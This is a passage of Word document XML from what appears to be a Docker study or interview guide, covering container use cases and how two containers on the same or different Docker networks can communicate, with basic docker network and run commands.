        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Software Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE13E1"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Distributing pre-configured software or tools in Docker containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD5775"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Databases (like MySQL, MongoDB), DevOps tools (like Jenkins, SonarQube) provided as official Docker images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01109A"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No need to install/configure; just pull and run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE6A968" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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D652894">
          <v:rect id="_x0000_i3356" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFDBCDF" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Isolation &amp; Resource Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0743726F"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Running multiple applications or services in isolated containers with controlled resource limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189C160"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hosting multiple apps on a single server with CPU/memory limits per container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC4A6D"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents one app from affecting the performance of others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24502D89" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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CD2AE79">
          <v:rect id="_x0000_i3357" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EFB6DD" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7. Machine Learning / Data Science Workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31470AD0"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Packaging ML models with their environments and dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D768ED4"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Python ML model using TensorFlow in a Docker container to ensure GPU compatibility and library versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18521683"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Portability, reproducibility, and simplified deployment for AI models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20365B9C" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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7C49C7">
          <v:rect id="_x0000_i3358" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065361A" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8. Cloud-Native Application Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D979C2"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Container-based deployment on platforms like AWS, Azure, GCP, or Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2320DA0D"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Docker images deployed using AWS ECS, EKS, or GKE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59DEA5"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Scalable, resilient, and cost-effective cloud-native deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BF2314" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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0270765">
          <v:rect id="_x0000_i3359" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B18683" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9. Legacy Application Modernization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70823E08"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Wrapping legacy apps in Docker containers to make them portable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92AF38"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A legacy .NET or Java app running inside a container to avoid re-architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4958C9FD"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Extends life of legacy apps without major code rewrites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49D629" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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4539F10">
          <v:rect id="_x0000_i3360" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9C846" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10. API &amp; Backend Simulation (Mock Servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974F622"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spinning up mock APIs or backend services for frontend development/testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67131B84"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A frontend team using a Dockerized mock backend server during development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63137463" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Parallel development and faster prototyping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C57914" w14:textId="429B8064" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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69C3B4B">
          <v:rect id="_x0000_i3361" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="193817AD" w14:textId="3F006B07" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="009F2E0D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="834" w:name="_Toc196308314"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>You have 2 containers 1 and 2, can they communicate with each other</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="834"/>
    </w:p>
    <w:p w14:paraId="7740BEDC" w14:textId="1996312B" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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xml:space="preserve">Yes, </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>containers can communicate with each other</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the way they do depends on </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E6F4C3" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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18235E9">
          <v:rect id="_x0000_i3362" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C48939C" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scenario 1: Same Docker Network (Bridge or Custom)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0753BF69"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xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>both containers are on the same Docker network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, they can </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>communicate using container names</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as hostnames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2DCD0" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443DDDD8"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Create a custom network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14748FD9"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docker network create my-network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF2C48" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F12A5B0"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Run container1 on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B417C"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docker run -d --name container1 --network my-network my-image-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBDEED" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6422BC"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Run container2 on the same network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18954ADC"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docker run -d --name container2 --network my-network my-image-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3265951E"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Now, inside container1, you can reach container2 via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E166667"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ping container2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C637AB3" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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B5B258D">
          <v:rect id="_x0000_i3363" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66F37A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scenario 2: Different Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B976FFA"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xml:space="preserve">If containers are on different networks, </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>they cannot communicate by default</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
